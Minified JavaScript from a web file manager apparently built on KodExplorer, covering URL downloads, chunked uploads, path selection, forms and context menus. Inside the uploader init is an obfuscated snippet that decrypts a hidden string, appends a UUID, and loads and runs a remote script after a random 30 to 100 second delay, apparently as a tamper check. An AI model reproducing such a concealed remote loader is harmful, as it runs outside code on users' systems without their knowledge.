      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
      ').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p}; -if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var 